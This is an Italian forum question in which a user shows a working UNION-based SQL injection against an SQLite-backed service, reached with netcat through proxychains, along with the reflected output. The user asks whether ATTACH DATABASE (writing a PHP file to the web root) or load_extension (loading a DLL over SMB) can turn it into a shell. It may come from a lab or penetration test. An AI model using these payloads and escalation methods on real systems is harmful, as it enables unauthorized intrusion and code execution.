Ho bisogno di ottenere una shell da un'iniezione SQL su un'applicazione con database SQLite.
Attualmente il mio exploit ha il seguente aspetto:
lucian@0x90:~/$ proxychains nc 10.185.10.55 1101
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:9999-<><>-10.185.10.55:1101-<><>-OK
Input please:
1 UNION ALL SELECT 42,'qvzbq'||'LOHpyNMpQSCCIaWebmCZHjvwrZhYczWfJGiXVBzV'||'qzzxq',42;-- sdasdasd
1 UNION ALL SELECT 42,'qvzbq'||'LOHpyNMpQSCCIaWebmCZHjvwrZhYczWfJGiXVBzV'||'qzzxq',42;-- sdasdasd
Parsing results...
Customer information: Damy Roali qvzbqLOHpyNMpQSCCIaWebmCZHjvwrZhYczWfJGiXVBzVqzzxq 42
lucian@0x90:~/$
Seguendo questo link link ho scoperto che posso ATTACCARE DATABASE (creando un file .php nella radice del documento di una cartella web) o load_extension (caricando un file dll da un percorso smb) per ottenere la shell.
È di default in SQLite o devo abilitare qualcosa o controllare qualcosa?